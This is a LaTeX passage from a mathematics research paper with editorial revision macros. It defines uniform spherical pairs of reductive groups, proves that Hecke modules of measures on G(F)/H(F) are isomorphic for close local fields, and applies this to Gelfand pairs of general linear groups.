Hence by Lemma \ref{HomLeib}(iii), $L^i\mathcal E = \mathcal C \circ L^i\mathcal K$.
Now, by Lemma \ref{HomCoinv},
$$\operatorname{H}_i(H(F),\rho)=L^i\mathcal F(\rho)=L^i\mathcal E(\mathcal G(\rho))=
\mathcal C(L^i\mathcal K(\mathcal G(\rho)))=\mathcal C(\operatorname{H}_i((H(F) \cap G_0)/(H(F)\cap
G^1),\mathcal G(\rho))).$$
Hence, by Lemma \ref{AFG}, if $\operatorname{H}_0(H(F),\rho)$ is finite
dimensional then $\operatorname{H}_1(H(F),\rho)$ is finite dimensional.
\end{proof}
\section{Uniform Spherical Pairs} \lbl{sec:UniSPairs}
In this section we introduce the notion of uniform spherical pair
and prove Theorem \ref{thm:ModIso}.
\Dima{We follow the main steps of \cite{Kaz}, where the author constructs an isomorphism between the Hecke algebras of a reductive group over close enough local fields. First, he constructs a linear isomorphism between the Hecke algebras, using Cartan decomposition. Then, he shows that for two given elements of the Hecke algebra there exists $m$ such that if the fields are $m$-close then the product of those elements will be mapped to the product of their images. Then he uses the fact that the Hecke algebras are finitely generated and finitely presented to deduce the theorem.}
\Dima{Roughly speaking, we call a pair $H<G$ of reductive groups a uniform spherical pair if it possesses a relative analog of Cartan decomposition, i.e. a ``nice'' description of the set of double cosets $K_0(G,F)\setminus G(F) / H(F)$ which in some sense does not depend on $F$. We give the precise definition in the first subsection and prove Theorem \ref{thm:ModIso} in the second subsection.}
\subsection{Definitions} \lbl{subsec:UniSpairs}$ $
Let $R$ be a complete and smooth local ring, let $m$ denote its maximal ideal, and let $\pi$ be an element in $m\setminus m^2$. A good example to keep in mind is the ring $\mathbb Z_p[[\pi]]$. An $(R,\pi)$-local field is a local field $F$ together with an epimorphism of rings $R\to O_F$, such that the image of $\pi$ (which we will continue to denote by $\pi$) is a uniformizer. Denote the collection of all $(R,\pi)$-local fields by $\mathcal F_{R,\pi}$.
Suppose that $G$ is a reductive group defined and split over $R$. Let $T$ be a fixed split torus, and let $X_*(T)$ be the coweight lattice of $T$. For every $\lambda\in X_*(T)$ and every $(R,\pi)$-local field $F$, we write $\pi^\lambda=\lambda(\pi)\in T(F)\subset G(F)$. We denote the subgroup $G(O_F)$ by $K_0(F)$, and denote its $\ell$'th congruence subgroup by $K_\ell(F)$.
\begin{defn}
Let $F$ be a local field.
Let $X \subset \mathbb A^n_{O_F}$ be a closed subscheme. For any $x,y\in X(F)$, define the valuative distance between $x$ and $y$ to be $val_F(x,y):=\min\{val_F(x_i-y_i)\}$. Also, for
any $x\in X(F)$, define $val_F(x):=\min\{val_F(x_i)\}$.
The ball of valuative radius $\ell$ around a point $x$ in
$X(F)$
will be denoted by $B(x,\ell)(F)$.
\end{defn}
\begin{defn}\lbl{defn:good.pair}
Let $G$ be a split reductive group defined over $R$ and let $H\subset G$ be a smooth reductive subgroup defined over $R$. We say that the pair $(G,H)$ is uniform spherical if there are
\begin{itemize}
\item An $R$-split torus $T\subset G$,
\item An affine embedding $G/H\hookrightarrow \mathbb A^n$.
\item A finite subset $\mathfrak X\subset G(R)/H(R)$.
\item A subset $\Upsilon\subset X_*(T)$.
\end{itemize} such that
\begin{enumerate}
\item The map $x\mapsto K_0(F)x$ from $\pi^\Upsilon\mathfrak X$ to $K_0(F)\backslash G(F)/H(F)$ is onto for every $F\in\mathcal F_{R,\pi}$. \lbl{cond:1}
\item For every $x,y \in \pi^\Upsilon \mathfrak X\subset (G/H)(R[\pi^{-1}])$, the closure in $G$ of the $R[\pi^{-1}]$-scheme \Dima{$$T_{x,y}:=\{g\in G \times_{\Spec(R)} \Spec(R[\pi^{-1}]) | gx=y\}$$} is smooth over $R$. We denote this closure by $S_{x,y}$.
\lbl{cond:connectors}
\item For every $x \in \pi^\Upsilon \mathfrak X$, the valuation $val_F(x)$ does not depend on $F \in \mathcal F_{R,\pi}.$
\RGRCor{\item There exists $l_0$ s.t. for any $l>l_0$, for any
$F\in\mathcal F_{R,\pi}$ and for every $x \in \mathfrak X$ and $\alpha \in
\Upsilon$ we have $K_l \pi^\alpha K_l x= K_l \pi^\alpha x $
\lbl{cond:GR}.}
\end{enumerate}
\nir{If $G,H$ are defined over $\mathbb Z$, we say that the pair $(G,H)$ is uniform spherical if, for every $R$ as above, the pair $(G\times_{\Spec(\mathbb Z)}\Spec(R),H\times_{\Spec(\mathbb Z)}\Spec(R))$ is uniform spherical.
}
\end{defn}
In Section \ref{sec:ap} we give two examples of uniform spherical pairs. We will list now several basic properties of uniform spherical pairs.
\RGRCor{In light of the recent developments in the structure theory of symmetric and spherical pairs (e.g. \cite{Del}, \cite{SV}),
we believe that the majority of symmetric pairs and many spherical pairs defined over local fields are specializations of appropriate uniform spherical pairs.}
From now and until the end of the section we fix a uniform spherical pair $(G,H)$. First note that, since $H$ is smooth, the fibers of $G\to G/H$ are smooth. Hence the map $G\to G/H$ is smooth.
\begin{lem}\lbl{lem:SO} Let $(G,H)$ be a uniform spherical pair.
Let $x,y\in \pi^{\Upsilon} \mathfrak X$. Let $F$ be an $(R,\pi)$-local field. Then
$$S_{x,y}(O_F) = T_{x,y}(F) \cap G(O).$$
\end{lem}
\begin{proof}
The inclusion $S_{x,y}(O_F) \subset T_{x,y}(F) \cap G(O_F)$ is evident. In order to prove the other inclusion we have to show that any map $\psi: \Dima{\Spec(O_F)\to G \times _{\Spec R} \Spec O_F}$ such that $\Img (\psi|_{\Spec F}) \subset \Dima{T_{x,y} \times _{\Spec R[\pi^{-1}]} \Spec F}$ satisfies $\Img \psi \subset \Dima{S_{x,y} \times _{\Spec R} \Spec O_F}$.
This holds since $\Dima{S_{x,y} \times _{\Spec R} \Spec O_F}$ lies in the closure of $\Dima{T_{x,y} \times_{\Spec R[\pi^{-1}]} \Spec F}$ in $\Dima{G \times _{\Spec R} \Spec O_F}$.
\end{proof}
\begin{lem} \lbl{lem:rough.bijection} If $(G,H)$ is uniform spherical, then there is a subset $\Delta\subset \pi^\Upsilon \mathfrak X$ such that, for every $F\in\mathcal F_{R,\pi}$, the map $x\mapsto K_0(F)x$ is a bijection between $\Delta$ and $K_0(F)\backslash G(F)/H(F)$.
\end{lem}
\begin{proof} It is enough to show that for any $F,F'\in\mathcal F_{R,\pi}$ and for any $x,y\in \pi^\Upsilon \mathfrak X$, the equality $K_0(F)x=K_0(F)y$ is equivalent to $K_0(F')x=K_0(F')y$.
The scheme $S_{x,y}\otimes O_F$ is smooth over $R$, and hence it is smooth over $O_F$. Therefore, it is formally smooth. This implies that the map $S_{x,y}(O_F) \to S_{x,y}(\mathbb F_q)$ is onto and hence $\{g\in G(O_F)| gx=y\}\neq\emptyset$ if and only if $S_{x,y}(\mathbb F_q)\neq\emptyset$.
Hence, the two equalities
$K_0(F)x=K_0(F)y$ and
$K_0(F')x=K_0(F')y$ are equivalent
to $S_{x,y}(\mathbb F_q)\neq\emptyset$.
\end{proof}
From now untill the end of the section we fix $\Delta$ as in the lemma.
\begin{prop} \lbl{prop:cond.ball} If $(G,H)$ is uniform spherical, then for every $x \in\pi^\Upsilon \mathfrak X$ and every $\ell\in\mathbb N$, there is $M\in\mathbb N$ such that for every $F\in\mathcal F_{R,\pi}$, the set $K_\ell(F)x$ contains a ball of radius $M$ around $x$.
\end{prop}
\begin{proof}
Since, for every $\delta\in X_*(T)$ and every $\ell\in\mathbb N$, there is $n\in\mathbb N$ such that $K_n(F) \subset \pi^\delta K_\ell(F)\pi^{-\delta}$ for every $F$, we can assume that $x \in \mathfrak X$. The claim now follows from the following version of the implicit function theorem.
\begin{lem} \lbl{lem:ball.crit}
Let $F$ be a local field. Let $X$ and $Y$ be affine schemes defined over $O_F$. Let $\psi:X \to Y$ be a smooth morphism defined
over $O_F$. Let $x \in X(O_F)$ and $y:=\psi(x)$. Then
$\psi(B(x,\ell)(F)) = B(y,\ell)(F)$ for any natural number $l$.
\end{lem}
\begin{proof}
The inclusion $\psi(B(x,\ell)(F)) \subset B(y,\ell)(F)$ is clear. We prove the inclusion
$\psi(B(x,\ell)(F)) \supset B(y,\ell)(F).$\\
Case 1: $X$ and $Y$ are affine spaces and $\psi$ is etale. The proof is standard.\\
Case 2: $X=\mathbb A^m$, $\psi$ is etale: We can assume that $Y\subset \mathbb A^{m+n}$ is defined by $f_1,\ldots,f_n$ with independent differentials, and that $\psi$ is the projection. The proof in this case follows from Case 1 by considering the map $F:\mathbb A^{m+n}\to\mathbb A^{m+n}$ given by $F(x_1,\ldots,x_{m+n})=(x_1,\ldots,x_m,f_1,\ldots,f_n)$.\\
Case 3: $\psi$ is etale: Follows from Case 2 by restriction from the ambient affine spaces.\\
Case 4: In general, a smooth morphism is a composition of an etale morphism and a projection, for which the claim is trivial.
\end{proof}
\end{proof}
\begin{lem} \lbl{lem:cond.fin} For every $\lambda \in X_*(T)$ and $x \in \pi^{\Upsilon}\mathfrak X$, there is a finite subset $B \subset\pi^{\Upsilon}\mathfrak X$ such that $\pi^\lambda K_0(F)x\subset\bigcup_{y\in B} K_0(F)y$ for all $F\in\mathcal F_{R,\pi}$.
\end{lem}
\begin{proof}
By Lemma \ref{lem:rough.bijection}, we can assume that the sets $K_0(F)\pi^\lambda x_0$ for $\lambda\in\Upsilon$ are disjoint. There is a constant $C$ such that for every $F$ and for every $g\in\pi^\lambda K_0(F)\pi^\delta$, $val_F(gx_0)\geq C$. Fix $F$ and assume that $g\in K_0(F)\pi^\lambda K_0(F)\pi^\delta$. From the proof of Proposition \ref{prop:cond.ball}, it follows that $K_0(F)gx_0$ contains a ball whose radius depends only on $\lambda,\delta$. Since $F$ is locally compact, there are only finitely many disjoint such balls in the set $\{x\in G(F)/H(F) \,|\, val_F(x)\geq C\}$, so there are only finitely many $\eta\in\Upsilon$ such that $val_F(\pi^\lambda x_0) \geq C$. By definition, this finite set, $S$, does not depend on the field $F$. Therefore, $\pi^\lambda K_0(F)\pi^\delta x_0\subset\bigcup_{\eta\in S} K_0(F)\pi^\eta x_0$.
\end{proof}
\RGRCor{
\begin{notation}
$ $
\begin{itemize}
\item Denote by $\mathcal M_\ell(G(F)/H(F))$ the space of $K_\ell(F)$-invariant
compactly supported measures on $G(F)/H(F)$.
\item For a $K_l$ invariant subset $U \subset G(F)/H(F)$ we denote by $1_U \in \mathcal M_\ell(G(F)/H(F))$ the Haar measure on $G(F)/H(F)$
multiplied by the characteristic function of $U$ and normalized s.t. its integral is $1.$ We define in a similar way $1_V \in \mathcal H_{\ell}(G,F)$ for a $K_l$-double invariant subset $V \subset G(F)$.
\end{itemize}
\end{notation}
}
\RGRCor{
\begin{prop} \lbl{prop:FG}
If $(G,H)$ is uniform spherical then $\mathcal M_\ell(G(F)/H(F))$ is finitely generated over $\mathcal H_{\ell}(G,F)$ for any $\ell$
\end{prop}
\begin{proof}
As in step 4 of Lemma \ref{VKFinGen}, it is enough to prove the assertion for large enough $l$. Thus we may assume that for every $x \in \mathfrak X$ and $\alpha \in
\Upsilon$ we have $K_l \pi^\alpha K_l x= K_l \pi^\alpha x $. Therefore,
$1_{K_l \pi^\alpha K_l}1_{K_l x}=1_{K_l \pi^\alpha x}$. Hence for any $g\in K_0/K_l$ we have
$(g 1_{K_l \pi^\alpha K_l})1_{K_l x}=1_{gK_l \pi^\alpha x}$. \DimaGRCor{Now, the elements $1_{gK_l \pi^\alpha x}$ span $\mathcal M_\ell(G(F)/H(F))$ by condition \ref{cond:1} in definition \ref{defn:good.pair}. } This implies that the elements $1_{K_l x}$ generate $\mathcal M_\ell(G(F)/H(F))$.
\end{proof}
}
\subsection{Close Local Fields}\lbl{subsec:CloseLocalFields}
\begin{defn} Two $(R,\pi)$-local fields $F,E\in\mathcal F_{R,\pi}$, are $n$-close if there is an isomorphism $\phi_{E,F}:O_F/\pi^n\to O_E/\pi^n$ such that the two maps $R\to O_F\to O_F/\pi^n\to O_E/\pi^n$ and $R\to O_E\to O_E/\pi^n$ coincide. In this case, $\phi$ is unique.
\end{defn}
\begin{thm}[\cite{Kaz}]
Let $F$ be an $(R,\pi)$ local field. Then, for any $\ell$, there exists $n$ such that, for any $E\in\mathcal F_{R,\pi}$, which is $n$-close to $F$, there exists a unique isomorphism $\Phi_{\mathcal H,\ell}$ between the algebras $\mathcal H_{\ell}(G,F)$ and $\mathcal H_{\ell}(G,E)$ that maps the Haar measure on $K_{\ell}(F)\pi^\lambda K_{\ell}(F)$ to the Haar measure on $K_{\ell}(E)\pi^\lambda K_{\ell}(E)$, for every $\lambda\in X_*(T)$, and intertwines the actions of the finite group $K_0(F)/K_{\ell}(F)\stackrel{\phi_{F,E}}{\cong}K_0(E)/K_{\ell}(E)$.
\end{thm}
In this section we prove the following refinement of Theorem \ref{thm:ModIso} from the Introduction:
\begin{thm} \lbl{thm:phiModIso} Let $(G,H)$ be a uniform spherical pair.
\Removed{
Suppose that the module $\mathcal M_\ell(G(F)/H(F))$ is finitely generated over the Hecke algebra $\mathcal H(G(F),K_\ell(F))$ for any $F\in\mathcal F_{R,\pi}$ and $\ell \in \mathbb N$. }
Then, for any $\ell \in \mathbb N$ and $F\in\mathcal F_{R,\pi}$, there exists $n$ such that, for any $E\in\mathcal F_{R,\pi}$ that is $n$-close to $F$, there exists a unique map $$\mathcal M_\ell(G(F)/H(F)) \to \mathcal M_\ell(G(E)/H(E))$$ which is an isomorphism of modules over the Hecke algebra $$\mathcal H(G(F),K_\ell(F))\stackrel{\Phi_{\mathcal H,\ell}}{\cong} \mathcal H(G(E),K_\ell(E))$$ that maps the Haar measure on $K_\ell(F)x$ to the Haar measure on $K_\ell(E)x$, for every $x\in\Delta\subset \pi^\lambda\Upsilon$, and intertwines the actions of the finite group $K_0(F)/K_\ell(F)\stackrel{\phi_{F,E}}{\cong}K_0(E)/K_\ell(E)$.
\end{thm}
For the proof we will need notation and several lemmas.
\begin{notation}
For any valued field $F$ with uniformizer $\pi$ and any integer $m \in \mathbb Z$, we
denote by $res_m:F \to F / \pi^m O$ the projection. Note that the
groups $\pi^n O$ are naturally isomorphic for all $n$.
Hence if two local fields $F,E\in\mathcal F_{R,\pi}$ are $n$-close,
then for any $m$ we are given an isomorphism, which we also denote by $\phi_{F,E}$ between $\pi^{m-n} O_F/\pi^{m}O_F$ and $\pi^{m-n} O_{E} /\pi^{m}O_{E}$, which are subgroups of
$F/\pi^{m}O_F$ and $E/\pi^{m}O_{E}$.
\end{notation}
\begin{lem} \lbl{lem:equal.stabilizers} Suppose that $(G,H)$ is a uniform spherical pair, and suppose that $F,E\in\mathcal F_{R,\pi}$ are $\ell$-close. Then for all $\delta\in\Delta$,
\[
\phi_{F,E}(\Stab_{K_0(F)/K_\ell(F)}K_\ell(F) \delta )=\Stab_{K_0(E)/K_\ell(E)}K_\ell(E) \delta.
\]
\end{lem}
\begin{proof} The stabilizer of $K_\ell(F)\delta$ in
$K_0/K_\ell$ is the projection of the stabilizer of $\delta$
in $K_0$ to $K_0/K_\ell$. In other words, it is the image of
$S_{\delta,\delta}(O_F)$ in $S_{\delta,\delta}(O_F/\pi^\ell)$.
Since
$S_{\delta,\delta}$ is smooth over $R$, it is smooth over $O_F$. Hence $S_{\delta,\delta}$ is formally smooth, and so
this map is onto. The same applies to the stabilizer of
$K_\ell(E)\delta$ in $K_0(E)/K_\ell(E)$, but
$\phi_{F,E}(S_{\delta,\delta}(O/\pi^\ell))=S_{\delta,\delta}(O'/\pi'^\ell)$.
\end{proof}
\begin{cor}\lbl{cor:LinIso}
Let $\ell \in \mathbb N$.
\Removed{Suppose that the module $\mathcal M_\ell(G(F)/H(F))$ is finitely generated over the Hecke algebra $\mathcal H(G(F),K_\ell(F))$ for any $F\in\mathcal F_{R,\pi}$. }
Then, for any $F,E\in\mathcal F_{R,\pi}$ that are $\ell$-close, there exists a unique \Dima{morphism
of vector spaces $$\Phi_{\mathcal M,\ell}:\mathcal M_\ell(G(F)/H(F)) \to \mathcal M_\ell(G(E)/H(E))$$ that maps the Haar measure on $K_\ell(F)x$ to the Haar measure on $K_\ell(E)x$, for every $x\in\Delta$, and intertwines the actions of the finite group $K_0(F)/K_{\ell}(F)\stackrel{\phi_{F,E}}{\cong}K_0(E)/K_{\ell}(E)$. \Dima{Moreover, this morphism is an isomorphism.}
\end{cor}
\begin{proof}
The uniqueness is evident.
By Lemma \ref{lem:equal.stabilizers} and Lemma \ref{lem:rough.bijection},
the map between $K_\ell(F)\backslash G(F)/H(F)$ and $K_\ell(E)\backslash G(E)/H(E)$ given by
\[
K_\ell(F) g\delta \mapsto K_\ell(E) g'\delta,
\]
where $g\in K_0(F)$ and $g'\in K_0(E)$ satisfy that
$\phi_{F,E}(res_\ell(g))=res_\ell(g')$, is a bijection.
This bijection gives the required isomorphism.
\end{proof}
\begin{remark}
A similar construction can be applied to the pair $(G\times G,\Delta G)$. In this case, the main result of \cite{Kaz} is that the obtained linear map $\Phi_{\mathcal H,\ell}$ between the Hecke algebras $\mathcal H(G(F),K_\ell(F))$ and $\mathcal H(G(E),K_\ell(E))$ is an isomorphism of algebras if the fields $F$ and $E$ are close enough.
\end{remark}
The following Lemma is evident:
\begin{lem} Let $P(x)\in R[\pi^{-1}][x_1,\ldots,x_d]$ be a polynomial. For any natural numbers $M$ and $k$, there is $N$ such that, if $F,E\in\mathcal F_{R,\pi}$ are $N$-close, and $x_0\in \pi^{-k}O_F^d,y_0\in \pi^{-k}O_E^d$ satisfy that $P(x_0)\in \pi^{-k}O_F$ and $\phi_{F,E}(res_{N}(x_0))=res_{N}(y_0)$, then $P(y_0)\in \pi^{-k}O_E$ and $\phi_{F,E}(res_{M}(P(x_0)))=res_{M}(P(y_0))$.
\end{lem}
\begin{cor} Suppose that $(G,H)$ is a uniform spherical pair.
Fix an embedding of $G/H$ to an affine space $\mathbb A^d$. Let $\lambda \in X_*(T)$, $x \in \pi^{\Upsilon}\mathfrak X$, $F\in\mathcal F_{R,\pi}$, and $k \in G(O_F)$. Choose $m$ such that $\pi^{\lambda} k x \in \pi^{-m}O_F^d$. Then, for every $M$, there is $N\geq M+m$ such that, for any $E\in\mathcal F_{R,\pi}$ that is $N$-close to $F$, and for any $k' \in G(O_E)$ such that $\phi_{F,E}(res_N(k))=res_N(k')$,
\[
\pi^{\lambda} k' x \in G(E)/H(E) \cap \pi^{-m}O_E^d \text{ and } \phi_{F,E}(res_M(\pi^{\lambda} k x))=res_M(\pi^{\lambda} k' x).
\]
\end{cor}
\begin{cor} Suppose that $(G,H)$ is a uniform spherical pair.
Fix an embedding of $G/H$ to an affine space $\mathbb A^d$. Let $m$ be an integer. For every $M$, there is $N$ such that, for any $F,E\in\mathcal F_{R,\pi}$ that are $N$-close, any $x \in G(F)/H(F) \cap \pi^{-m}O_F^d$ and any $y\in G(E)/H(E) \cap \pi^{-m}O_E^d$, such that $\phi_{F,E}(res_{N-m}(x))=res_{N-m}(y)$, we have $\Phi_{\mathcal M}(1_{K_M(F)} x) = 1_{K_M(E)} y$.
\end{cor}
\begin{proof}
Let $k_F \in G(O_F)$ and $\delta \in \Delta$ such that $x=k_F\delta$. By Proposition \ref{prop:cond.ball}, there is an $l$ such that, for any $L\in\mathcal F_{R,\pi}$ and any $k_L \in
G(O_L)$, we have $K_M(L)k_L\delta$ contains a ball of radius $l$.
Using the previous corollary, choose an integer $N$ such that, for any $F$ and $E$ that are $N$-close and any $k_E \in G(O_E)$, such that $\phi_{F,E}(res_N(k_F))=res_N(k_E)$, we have
\[
k_E \delta \in (G(E)/H(E)) \cap \pi^{-m}O_E^d \text{ and }\phi_{F,E}(res_l(x))=res_l(k_E \delta).
\]
Choose such $k_E \in G(O_E)$ and let $z = k_E \delta$. Since $res_l(z)=\phi_{F,E}(res_l(x))=res_l(y)$, we have that $z \in B(y,l)$, and hence $z \in K_M(E)y$. Hence
\[
1_{K_M(E)}y=1_{K_M(E)}z = \Phi_{\mathcal M}(1_{K_M(F)} x).
\]
\end{proof}
From the last two corollaries we obtain the following one.
\begin{cor}\lbl{cor:CharFun} Given $\ell \in \mathbb N$, $\lambda \in X_*(T)$, and $\delta \in \Delta$, there is $n$ such that if $F,E\in\mathcal F_{R,\pi}$ are $n$-close, and $g_F\in G(O_F),g_E\in G(O_E)$ satisfy that $\phi_{F,E}(res_n(g_F))=res_n(g_E)$, then $\Phi_{\mathcal M,\ell}(1_{K_\ell(F)} \pi^\lambda g_F \delta)=1_{K_\ell(E)}\pi^\lambda g_E \delta$.
\end{cor}
\begin{prop} \lbl{prop:local.isom} Let $F\in\mathcal F_{R,\pi}$. Then for every $\ell$, and every two elements $f\in\mathcal H_\ell(F)$ and $v\in\mathcal M_\ell(F)$, there is $n$ such that, if $E\in\mathcal F_{R,\pi}$ is $n$-close to $F$, then $\Phi_{\mathcal M,\ell}(f\cdot v)=\Phi_{\mathcal H,\ell}(f)\cdot\Phi_{\mathcal M,\ell}(v)$.
\end{prop}
\begin{proof} By linearity, we can assume that $f = 1_{K_\ell(F)} k_1 \pi^\lambda k_2
1_{K_\ell(F)}$ and that $v= 1_{K_\ell(F)} k_3\delta$, where
$k_1,k_2,k_3\in K_0(F)$. Choose $N \geq l$ big enough so that
$\pi^\lambda K_N(F) \pi^{-\lambda} \subset K_\ell(F)$.
Choose $k_i'\in G(O_E)$ such that $\phi_{F,E}(res_N(k_i))=res_N(k_i')$.
Since $\Phi_{\mathcal M,\ell}$ and $\Phi_{\mathcal H,\ell}$ intertwine left multiplication by
$1_{K_\ell(F)} k_1 1_{K_\ell(F)}$ to left multiplication by $1_{K_\ell(E)}
k'_1 1_{K_\ell(E)}$, we can assume that $k_1=1=k'_1$. Also, since
$k_2$ normalizes $K_\ell(F)$, we can assume that $k_2=1=k'_2$. Let
$K_\ell(F)=\bigcup_{i=1}^s K_N(F) g_i$ be a decomposition of $K_\ell(F)$
into cosets. Choose $g'_i\in K_\ell(E)$ such that
$\phi_{F,E}(res_N(g_i))=res_N(g'_i)$. Then
\[
1_{K_\ell(F)}=c\sum_{i=1}^s 1_{K_N(F)} g_i \text{ and } 1_{K_\ell(E)}=c\sum_{i=1}^s 1_{K_N(E)} g'_i
\]
where $c=|K_\ell(F)/K_N(F)|=|K_\ell(E)/K_N(E)|$. Hence
\[
fv=1_{K_\ell(F)} \pi^\lambda 1_{K_\ell(F)} k_3 \delta =c\sum_{i=1}^s
1_{K_\ell(F)} \pi^\lambda 1_{K_N(F)} g_i k_3 \delta =c\sum_{i=1}^s
1_{K_\ell(F)} \pi^\lambda g_i k_3 \delta .
\]
and
\[
\Phi_{\mathcal H,\ell}(f)\Phi_{\mathcal M,\ell}(v)=1_{K_\ell(E)} \pi^\lambda 1_{K_\ell(E)} k'_3 \delta=c\sum_{i=1}^s 1_{K_\ell(E)} \pi^\lambda 1_{K_N(E)} g_i k'_3\delta =c\sum_{i=1}^s 1_{K_\ell(E)} \pi^\lambda g'_i k'_3 \delta.
\]
The proposition follows now from Corollary \ref{cor:CharFun}.
\end{proof}
Now we are ready to prove Theorem \ref{thm:phiModIso}.
\begin{proof}[Proof of Theorem \ref{thm:phiModIso}]
We have to show for any $\ell$ there exists $n$ such that if $F,E\in \mathcal F_{R,\pi}$ are $n$-close then the map
$\Phi_{\mathcal M,l}$ constructed in Corollary \ref{cor:LinIso} is an isomorphism of modules over $\mathcal H(G(F),K_\ell(F))\stackrel{\Phi_{\mathcal H,\ell}}{\cong} \mathcal H(G(E),K_\ell(E))$.
Since $\mathcal H(G(F),K_\ell(F))$ is Noetherian, $\mathcal M_\ell(G(F)/H(F))$ is generated by a finite set $v_1,\ldots,v_n$ satisfying a finite set of relations $\sum_i f_{i,j}v_i=0$.
\RGRCor{Without loss of generality we may assume that for any $x \in \mathfrak X$ the Haar measure on $K_\ell(F)x$ is contained in the set $\{v_i\}.$}
By Proposition \ref{prop:local.isom}, if $E$ is close enough to $F$, then $\Phi_{\mathcal M,\ell}(v_i)$ satisfy the above relations.
Therefore there exists a homomorphism of Hecke modules $\Phi':\mathcal M_\ell(G(F)/H(F))\to\mathcal M_\ell(G(E)/H(E))$ given on the generators $v_i$ by $\Phi'(v_i):= \Phi_{\mathcal M,\ell}(v_i)$. \\ \RGRCor{
$\Phi'$ intertwines the actions of the finite group $K_0(F)/K_{\ell}(F)\stackrel{\phi_{F,E}}{\cong}K_0(E)/K_{\ell}(E)$. Therefore, by Corollary \ref{cor:LinIso}, in order to show that $\Phi'$ coincides with $\Phi_{\mathcal M,\ell}$ it is enough to check that $\Phi'$ maps the normalized Haar measure on $K_\ell(F)x$ to the normalized Haar measure on $K_\ell(E)x$ for every $x\in\Delta$. In order to do this let us decompose $x=\pi^\alpha x_0$ where
$x_{0} \in \mathfrak X$ and $\alpha \in \Upsilon.$ Now, since $(G,H)$ is uniformly spherical we have $$1_{K_n(F) x}=1_{K_n(F) \pi^\alpha K_n(F)}1_{K_n(F) x_0}$$ and $$1_{K_n(E) x}=1_{K_n(E) \pi^\alpha K_n(E)}1_{K_n(E) x_0}.$$ Therefore, since $\Phi'$ is a homomorphism, we have $$\Phi'(1_{K_n(F) x})=\Phi'(1_{K_n(F) \pi^\alpha K_n(F)}1_{K_n(F) x_0})= 1_{K_n(E) \pi^\alpha K_n(E)}1_{K_n(E) x_0}=1_{K_n(F) x}.$$
}
Hence the linear map $\Phi_{\mathcal M,\ell}:\mathcal M_\ell(G(F)/H(F))\to\mathcal M_\ell(G(E)/H(E))$ is a homomorphism of Hecke modules. Since it is a linear isomorphism, it is an isomorphism of Hecke modules.
\end{proof}
Now we obtain \Dima{the following generalization of }Corollary \ref{cor:GelGel}:
\begin{cor}\lbl{cor:GelGel2}
Let $(G,H)$ be a uniform spherical pair. Suppose that
\begin{itemize}
\item For any $F\in\mathcal F_{R,\pi}$, the pair $(G,H)$ is $F$-spherical.
\Removed{
\item For any $F\in\mathcal F_{R,\pi}$ and any irreducible smooth representation $\rho$ of $G(F)$ we have
$$\dim\Hom_{H(F)}(\rho|_{H(F)}, \mathbb C) < \infty .$$}
\item
\Dima{For any $E\in\mathcal F_{R,\pi}$ and natural number $n$, there is a field $F\in\mathcal F_{R,\pi}$ such that $E$ and $F$ are $n$-close and the pair $(G(F),H(F))$ is a Gelfand pair, i.e. for any irreducible smooth representation $\rho$ of $G(F)$ we have
$$\dim\Hom_{H(F)}(\rho|_{H(F)}, \mathbb C) \leq 1 .$$}
\end{itemize}
Then $(G(F),H(F))$ is a Gelfand pair for any $F\in\mathcal F_{R,\pi}$.
\end{cor}
\nir{\begin{rem} Fix a prime power $q=p^k$. Let $F$ be the unramified extension of $\mathbb Q_p$ of degree $k$, let $W$ be the ring of integers of $F$, and let $R=W[[\pi]]$. Then \Dima{$\mathcal F_{R,\pi}$ includes all local fields with residue field $\mathbb F_q$,} and so Corollary \ref{cor:GelGel2} implies Corollary \ref{cor:GelGel}.
\end{rem}}
Corollary \ref{cor:GelGel2} follows from \Dima{Theorem \ref{thm:phiModIso}},
Theorem
\ref{FinGen}, and the following lemma.
\begin{lem}
Let $F$ be a local field and $H<G$ be a pair of reductive groups
defined over $F$. \Dima{Suppose that $G$ is split over $F$.}
Then $(G(F),H(F))$ is a Gelfand pair if and only
if for any \Dima{large enough }$l \in \mathbb Z_{>0}$ and any simple module $\rho$ over
$\mathcal H_l(G(F))$ we have
$$ \dim \Hom_{\mathcal H_l(G(F))} (\mathcal M_l(G(F)/H(F)), \rho) \leq 1.$$
\end{lem}
This lemma follows from statement (\ref{1}) formulated in Subsection
\ref{subsec:prel}.
\section{Applications}
\lbl{sec:ap}
\setcounter{thm}{0}
In this section we prove that the pair
$(\GL_{n+k}(F),\GL_n(F) \times\GL_k(F))$ is a Gelfand pair for any
local field $F$ of characteristic different from 2 and the pair
$(\GL_{n+1}(F),\GL_n(F) )$ is a strong Gelfand pair for any local
field $F$. We use \Dima{Corollary \ref{cor:GelGel2} }
to deduce those results from the
characteristic zero case which were proven in \cite{JR} and
\cite{AGRS} respectively.
\Dima{Let $R=W[[\pi]]$.}
To verify condition (\ref{cond:connectors}) in Definition \ref{defn:good.pair}, we use the following straightforward lemma:
\begin{lem} \lbl{lem:SmoothCrit}
Let $G= (\GL_{n_1})_R \times \cdots \times (\GL_{n_k})_R$ and let $C<G \otimes_R R[\pi^{-1}]$
be a sub-group scheme defined over $R[\pi^{-1}]$. Suppose that $C$ is defined by equations of the
following type:
$$ \sum_{i=1}^{l} \epsilon_i a_{\mu_i} \pi^{\lambda_i} = \pi^{\nu},$$
or
$$ \sum_{i=1}^{l} \epsilon_i a_{\mu_i} \pi^{\lambda_i} = 0,$$
where $\epsilon_i = \pm 1$, $a_1,...,a_{n_1^2+...+n_k^2}$ are entries
of matrices, $1 \leq \mu_i \leq n_1^2+...+n_k^2$ are some indices,
and $\nu,\lambda_i$ are integers. Suppose also that the indices
$\mu_i$ are distinct for all the equations. Then the closure
$\overline{C}$ of $C$ in $G$ is smooth over $R$.
\end{lem}
\DimaGRCor{To verify condition (\ref{cond:GR}) in Definition
\ref{defn:good.pair}, we use the following straightforward lemma:
\begin{lem} \lbl{lem:GRCrit}
Suppose that there exists a natural number $\ell_0$ such that, for any $F\in\mathcal F_{R,\pi}$ and any $\ell>\ell_0$, there is a subgroup $P_\ell<K_\ell(G,F)$ satisfying that
for every $x \in \mathfrak X$
\begin{enumerate}
\item For any $\alpha \in \Upsilon$ we have $\pi^\alpha P_\ell
\pi^{-\alpha} \subset K_\ell$.
\item $K_\ell x = P_\ell x$.
\end{enumerate}
Then condition (\ref{cond:GR}) in Definition \ref{defn:good.pair}
is satisfied.
\end{lem}}
In our applications, we use the following to show that the pairs we consider are $F$-spherical.
